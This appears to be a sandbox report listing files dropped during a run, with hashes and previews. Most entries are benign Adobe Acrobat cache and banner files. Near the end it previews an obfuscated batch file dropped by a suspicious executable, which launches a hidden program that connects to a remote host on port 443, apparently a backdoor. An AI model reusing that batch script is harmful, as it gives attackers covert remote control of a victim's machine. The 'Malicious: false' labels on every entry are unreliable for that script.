SSDEEP:	6:YEQXJ2HXWIf5KWWsGiIPEeOF0YOQziEeoAvJfBD2G6UpnrPeUkwRe9:YvXKXWIf5WsdTeO+sGR22cUkee9
MD5:	CEB4756BDBAA775AA2CCB5D90C6BDB3D
SHA1:	5F65B997C372C5EADE5AE0E9C4AE39C10A12264B
SHA-256:	169FC960E2DA8CB9BDBEBAC814DA9754057353CD914CB583FA9D1266EC682362
SHA-512:	6F4544193FDDE5C556F2A73BE52F05105611C1EDA045B968E4E5BAADCF956EDF6D9B60946542D6622B6EE353486DB37D6755A39870751FC78A0F781EF50D2838
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"e9075dbc-6196-4174-8a4f-f1d5f11cba2c","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735132543980,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	285
Entropy (8bit):	5.367449683587786
Encrypted:	false
SSDEEP:	6:YEQXJ2HXWIf5KWWsGiIPEeOF0YOQziEeoAvJfPmwrPeUkwRe9:YvXKXWIf5WsdTeO+sGH56Ukee9
MD5:	75551BDD46131EEC35D0D9AF158ECFAE
SHA1:	AD2D5CAE0FA836374473EB3C9D70A1379DBE8591
SHA-256:	4FA557D94B2ED58AD6B7946A01941A8127E7BC01C0B34B3E0B6A1C884C4E7E42
SHA-512:	D5437BB41810D2889A743B1FA4BF61BBE230BB59FBF6000BE8E73CC97AD3A8641974AEC05AB94E6B6C5955982EBC533BE3AC3E6809B703519F27881B4390F541
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"e9075dbc-6196-4174-8a4f-f1d5f11cba2c","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735132543980,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1123
Entropy (8bit):	5.687256023563033
Encrypted:	false
SSDEEP:	24:Yv6XWYWmeOWpLgE9cQx8LennAvzBvkn0RCmK8czOCCSg:YvqVeFhgy6SAFv5Ah8cv/g
MD5:	B83119D3FE793A307C733D1BDFCEEEBD
SHA1:	5A2DD7DC2596025DF15835F92ACCAB73468096E6
SHA-256:	791F9BF7759E40FCAA0CF7B1DD381BA179FF71AD47E57E81B8FC1FDCB5F17D09
SHA-512:	9B20FA5794F906EC49FA56182E27B553268A8CDEE07059C37404D98C9428909E623310C48D44A283A5060AE952363565BBECFCD45FF50D81ECE0FDC630C7FC7D
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"e9075dbc-6196-4174-8a4f-f1d5f11cba2c","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735132543980,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.303325794842211
Encrypted:	false
SSDEEP:	6:YEQXJ2HXWIf5KWWsGiIPEeOF0YOQziEeoAvJf8dPeUkwRe9:YvXKXWIf5WsdTeO+sGU8Ukee9
MD5:	4070C2C38313EA7C6767D5A94F631CD1
SHA1:	A7365C115FA64D6DE9D0289133C6AA8A0E32FC70
SHA-256:	723533F24C71DF588FD204D0235714A3789F0A7811D3470B614353B0092A5C42
SHA-512:	6AF7FECF8D0C70E724B8A2BFE31D537713D57CA56A00EC5F416562E8FE0B699DA02D07B11CAF6A818743A019BF290D8C036C907FFEBABEE8082E6DA22EC11797
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"e9075dbc-6196-4174-8a4f-f1d5f11cba2c","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735132543980,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.307483060736832
Encrypted:	false
SSDEEP:	6:YEQXJ2HXWIf5KWWsGiIPEeOF0YOQziEeoAvJfQ1rPeUkwRe9:YvXKXWIf5WsdTeO+sGY16Ukee9
MD5:	DC4DA4CF8339C53A45BA44270B71C974
SHA1:	57813448BF7D6130E04E9870BFCFDED9054243FE
SHA-256:	16A7EC175D391E0204FB4720F6289C2EC8B8F5BA95456F11D8F5D54AD9BCE03B
SHA-512:	1567B7DEC2D06C01BE7FE755C2308730A6AF636D2AC98D9EEC95E383819417B9DE7057C1F4C6FBB2FE920711B2332B867FBB7DBACC3643251DB48101F065F0D5
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"e9075dbc-6196-4174-8a4f-f1d5f11cba2c","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735132543980,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.3232414474707435
Encrypted:	false
SSDEEP:	6:YEQXJ2HXWIf5KWWsGiIPEeOF0YOQziEeoAvJfFldPeUkwRe9:YvXKXWIf5WsdTeO+sGz8Ukee9
MD5:	113C2791E137C7A5A87749A4AF2A8C7F
SHA1:	A61725CB8CBC9F2F94864303CCEB03827AB7AAAD
SHA-256:	3B1AF87BC438E66EAC79CE74A5A3FDE291CD3B057DACE2DA6CC74D0F54A7D1C3
SHA-512:	8D7E768290FF511E211A768661FC29C7365F60AF47D98511FDA8C6D87951922AC7C9EBBE8770AD8BAFFA4801AB9E40B389090D23432285693C6A7CE53212EC44
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"e9075dbc-6196-4174-8a4f-f1d5f11cba2c","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735132543980,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.330123253505776
Encrypted:	false
SSDEEP:	6:YEQXJ2HXWIf5KWWsGiIPEeOF0YOQziEeoAvJfzdPeUkwRe9:YvXKXWIf5WsdTeO+sGb8Ukee9
MD5:	1BD7D7B34C1B352AB3CA635C95182FE0
SHA1:	0EC7C5823EDBF70B3C4BEE0A362C2693C7085CF6
SHA-256:	45450536935E65C85EA03E0C43F4CF853EF8EF77AAE97A750AFF0488B2B8C647
SHA-512:	B54C1AD39279D833DC08F5383A456FAC6FC3C9870DA79EF5FDE9127B6C42215ABCD58B0721785404F85BAB2D350D9965591CE91B98E949FFC8DA369285053B5C
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"e9075dbc-6196-4174-8a4f-f1d5f11cba2c","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735132543980,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.310990379654976
Encrypted:	false
SSDEEP:	6:YEQXJ2HXWIf5KWWsGiIPEeOF0YOQziEeoAvJfYdPeUkwRe9:YvXKXWIf5WsdTeO+sGg8Ukee9
MD5:	1A625E0139BC22B95E000B695EEE8464
SHA1:	5558228AF362010BD9CC9F64ABA7A39435941172
SHA-256:	A9DBCA6531FA26EDA26E16D6E8B8F480B1D12CEA907EE2B5A0F63DF904A1076A
SHA-512:	2F4F91080B0E80E29BDD322FF7FE221BC24803A929E96BB601A51654EFB042E7B3B07DD26745E610594662D1509EF55B5B02D399C777222A41932E5FC0FDD59D
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"e9075dbc-6196-4174-8a4f-f1d5f11cba2c","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735132543980,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	284
Entropy (8bit):	5.2972342450774095
Encrypted:	false
SSDEEP:	6:YEQXJ2HXWIf5KWWsGiIPEeOF0YOQziEeoAvJf+dPeUkwRe9:YvXKXWIf5WsdTeO+sG28Ukee9
MD5:	3023CC63332AD010866CE534F9C076E9
SHA1:	1B82650EF27ACB6032C5FB448223730F709B4512
SHA-256:	BF7BDFFB872025A1B0A4138E46E9A7E6159F99457F2731BF6545FC78FADEDE86
SHA-512:	D92201DAC4948F82CBBCC928F10B5C22CF3BB3A30C95EF507DD31F527EB81A2CBFE26362C3E079D50DD6F8555DCBBC4623C975B4F26D8274AB45043582320F69
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"e9075dbc-6196-4174-8a4f-f1d5f11cba2c","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735132543980,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	291
Entropy (8bit):	5.294461942073481
Encrypted:	false
SSDEEP:	6:YEQXJ2HXWIf5KWWsGiIPEeOF0YOQziEeoAvJfbPtdPeUkwRe9:YvXKXWIf5WsdTeO+sGDV8Ukee9
MD5:	A89C88A8ECA864ECB45FFCFB002F09F0
SHA1:	AC2A268457AFF4EDFC6530DF1E43DE3A5325CC73
SHA-256:	8363D88D94578DBA43A688CC1216C70DE9D890ED7C8E792A4457A28A91B49B7D
SHA-512:	C86DACE5F177083138CB314CC9F2C91873D29F74F391453B6F1E1CE46DA8CF57AFE964C39BF3B58838EFD9E8E1F849D5C62372B11E878F450215160B7E3C7936
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"e9075dbc-6196-4174-8a4f-f1d5f11cba2c","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735132543980,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	287
Entropy (8bit):	5.299265517976599
Encrypted:	false
SSDEEP:	6:YEQXJ2HXWIf5KWWsGiIPEeOF0YOQziEeoAvJf21rPeUkwRe9:YvXKXWIf5WsdTeO+sG+16Ukee9
MD5:	539EF1459353459AFFAC2AFFDD574F48
SHA1:	6CE76057B25DF6818F09C13D10D4FBF7A9ABD46B
SHA-256:	62184D56C222016C28CC2D97B53132DEF709B8C05947FBFA3A148268BEA59398
SHA-512:	D2838AA9508F97082FF9E3199B1429D9B85E5AFF88A58B7B84C05F37BCD05694C97B0F27B059401BD7DF86780DED1D3635585689F0F33855AB6953A4B1B59094
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"e9075dbc-6196-4174-8a4f-f1d5f11cba2c","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735132543980,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	5.6615957415639695
Encrypted:	false
SSDEEP:	24:Yv6XWYWmeOKamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSg:YvqVexBgkDMUJUAh8cvMg
MD5:	04B03E597B966D8DA95B8E41C5A2FD4A
SHA1:	B5EC18223DEBE01E2BEB27C80D1248F6736F9233
SHA-256:	FDE4BA802BDF4FDA972E23091B75A275EAC2158A2672F59434F28D22DCBAF834
SHA-512:	5E67A1087FE56D4961DFA7886594866C5752D1F9EC7956535E259348B8BA4B04AE09963F7889C3E2AA232A258113C09E420ED9F58E7E4085AFE1D6E5496F1590
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"e9075dbc-6196-4174-8a4f-f1d5f11cba2c","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735132543980,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	286
Entropy (8bit):	5.274648659566273
Encrypted:	false
SSDEEP:	6:YEQXJ2HXWIf5KWWsGiIPEeOF0YOQziEeoAvJfshHHrPeUkwRe9:YvXKXWIf5WsdTeO+sGUUUkee9
MD5:	5066F79460619DB2DB50D1923099239B
SHA1:	556C5E51E901C7A8ACA8EC40C008EDE8CDD84D6E
SHA-256:	3498A82FA52B3CDE8C17A6C4A7E857EBACC1EF13A802F3168AE341037F37B198
SHA-512:	07A15F038FEA4C0A12F7B0F477BB0980CADB00F9ADB447E1911C3A7C04FD0F91627C43B13B4061702458131172FE2A8D657B499A7290076D56ADDC16911B628F
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"e9075dbc-6196-4174-8a4f-f1d5f11cba2c","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735132543980,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	282
Entropy (8bit):	5.294146503566172
Encrypted:	false
SSDEEP:	6:YEQXJ2HXWIf5KWWsGiIPEeOF0YOQziEeoAvJTqgFCrPeUkwRe9:YvXKXWIf5WsdTeO+sGTq16Ukee9
MD5:	EB354F092670D2CCB6171E99F78D80A2
SHA1:	DCF6048A83F673B27B79AEBC1DEFBDC420477815
SHA-256:	C5B2DADB221F8216681B601C0F400BE05BEFE51297A91C2807D1B115629A3BC9
SHA-512:	81A6E17CB3E1F3DD8A17939AFCCDC59C264B34A322A09BC16E06A7C92074B48507A83F0BF9D6C1D5767C9548E9835421BD771F189116EB564A974F4F221D9D07
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"e9075dbc-6196-4174-8a4f-f1d5f11cba2c","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735132543980,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	4
Entropy (8bit):	0.8112781244591328
Encrypted:	false
SSDEEP:	3:e:e
MD5:	DC84B0D741E5BEAE8070013ADDCC8C28
SHA1:	802F4A6A20CBF157AAF6C4E07E4301578D5936A2
SHA-256:	81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
SHA-512:	65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
Malicious:	false
Preview:	....

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2814
Entropy (8bit):	5.148919685711019
Encrypted:	false
SSDEEP:	48:YWxUB+C4/+OsoZuWlk/vqcUJFAyYup942T:OV4/JsoZviqt3ZBndT
MD5:	B9296C135520BCCD331838D42F860045
SHA1:	2CDF872D2BA29F716B462C788F5764911CE0D61F
SHA-256:	BB523B468B8E980535642CC5678E754337B7C7B619CA2F6259801ADEE04DFDCE
SHA-512:	6212D1A30F2F6917889C0A316BC0636DAD2DA638C664A97AA02E8F46EE4C2C048DC03C3C9F133E93EFF5ED440F84081F7CFFB36B6E1C2A585E86CB43563E2831
Malicious:	false
Preview:	{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"67140b3a4ab5df76f5444439bb677528","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734956968000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"79c6899c2cb25ea40c5262cdeccd79a2","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734956968000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"e1b14ec051075765977dc4a9075f7ba0","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734956968000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"3846285677ccd1159cc2ea1db47f8678","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734956968000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"cd0e792ce9f1cb7c313067235d6f4a87","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734956968000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"4498c821cccc56f68b40d85e79e25dd1","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	1.4525061227319425
Encrypted:	false
SSDEEP:	48:TGufl2GL7msCvrBd6dHtbGIbPe0K3+fDy2dsGlK:lNVmsw3SHtbDbPe0K3+fDZdE
MD5:	BF46CC8C362366101D09E41E139EE41B
SHA1:	376808839BDF47BC26253FB40F24EC78894A794F
SHA-256:	6DDBCBBF20E26EA4C785F54C8B386C90D3FCBAE5AE29875C03566F392D428ED4
SHA-512:	F4615EE8E9D8E2AF953B83382477B1F3EE4C5DA01F148188D2814715671F17EF7A578C135E99765E182CD5582ED98D2C96D803BA3A83ECCF6872AF6ADB338CEC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	1.9569814058667885
Encrypted:	false
SSDEEP:	48:7MLrvrBd6dHtbGIbPe0K3+fDy2ds3XqFl2GL7msD:723SHtbDbPe0K3+fDZd6KVmsD
MD5:	F8AFA604B23627FC0A3CC93667A75CA8
SHA1:	38CF820ED99A71C84E2399EFBF82693E811F9C31
SHA-256:	637608345F065567145BC68AA76E96FE3635EA11CBE1EEF9932A54FEFF873E74
SHA-512:	BBB9CD7A4922B0CC53AFBD2BBA1C7CC978A4F4B858E75D01A7A9F8E6D780CA8BA022051FDF6E76E35F202D663E3C4858A66D17640D34EEBAF381E7DECAC8F00C
Malicious:	false
Preview:	.... .c.....N........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................v.../.././././....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	66726
Entropy (8bit):	5.392739213842091
Encrypted:	false
SSDEEP:	768:RNOpblrU6TBH44ADKZEgZAFdL8v8OH19xAv9RqmezjxQR0Yyu:6a6TZ44ADEZCdLPOV9xNxQ6K
MD5:	76C01CB0FF7BB152C3E4BB3514BBAB5F
SHA1:	8DBAC253849ACE84A83EABE8A8075BF077F4BD3D
SHA-256:	8F595BD8EB251C66B083576B409C829A4C27663060CF33906D5632A454CBBBE0
SHA-512:	4A45546CBE237A67B0C6E6783A03B837E818A5BD469BAAD74ABCC8A61D545D432D984B04F4F7853B41D923A3A6D695D0C506B3F67553623DE6E387A90192C888
Malicious:	false
Preview:	4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\3889122.Khe9oLY

Download File

Process:	C:\Users\user\Desktop\T8xrZb7nBL.exe
File Type:	DOS batch file, ASCII text
Category:	dropped
Size (bytes):	503
Entropy (8bit):	5.353292454999417
Encrypted:	false
SSDEEP:	12:5YVJl5uPdbHjjQxSyQL+kKqWuocWFfH61w26SgPQmPZC:gl5ubEpo+kKIpOP2g50
MD5:	41F0189B83E9D493B86D7182B3514F9D
SHA1:	D4EC6020DE07E7D10552189CE4025B220467A522
SHA-256:	7653F9CB0A81E850998E4E171FC72B99765F198A0E5CA2AF51EE698137E242FA
SHA-512:	AA941D46D50737B3A8179C27631814852BAE90601349D6BE7B769486CF6189254209758183BC59B34DE20BCC64047AA45AFE62104B08E0C6413753CCED55CC92
Malicious:	false
Preview:	@echo off.setlocal enabledelayedexpansion.set QEy79=browser_sn.set Mkr26=co.set ReO81=nhost.set dUEeo=443.set wP5sf=%COMPUTERNAME%.set LtQEq=co.set Eqm2m=nne.set wapw9=ct.set Gruna=tbdcic.info.set oSLdS=exe.set jSEQA=autore.set HaGkC=194.87.252.28.timeout /t 1.taskkill /f /im %QEy79%.%oSLdS% .timeout /t 2.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% .timeout /t 8.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% -%jSEQA%%LtQEq%%Eqm2m%%wapw9% -id:%wP5sf%_Jd0Qd -%LtQEq%%Eqm2m%%wapw9% %Gruna%:443.timeout /t 4.exit.

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\9655269573

Download File

Process:	C:\Users\user\Desktop\T8xrZb7nBL.exe
File Type:	DOS batch file, ASCII text
Category:	dropped
Size (bytes):	1001
Entropy (8bit):	5.502266483327757
Encrypted:	false
SSDEEP:	24:g5byOTMorMKXGw+kMLz2NcflizT/P2bkAMlvRx/m:IOOBrMKx8TMzL9vx/m
MD5:	A99AF3E2449A048C4436329C1AF6F48F
SHA1:	06C2CB982455A7A2FCB76AE70D7C3ED6871361DA
SHA-256:	B3571E56EB1A88188B2CE9AC1E67F429E7D949D09528437A7F32689A2371CC78
SHA-512:	C8AD6E74A0C8D29538042FDC429547AD0FB7E8F96B3E5E59644EFA6837BF243E31A3193F2B385316421730733330F346498044EFC62BA152AC79FC7CD9C7A559
Malicious:	false
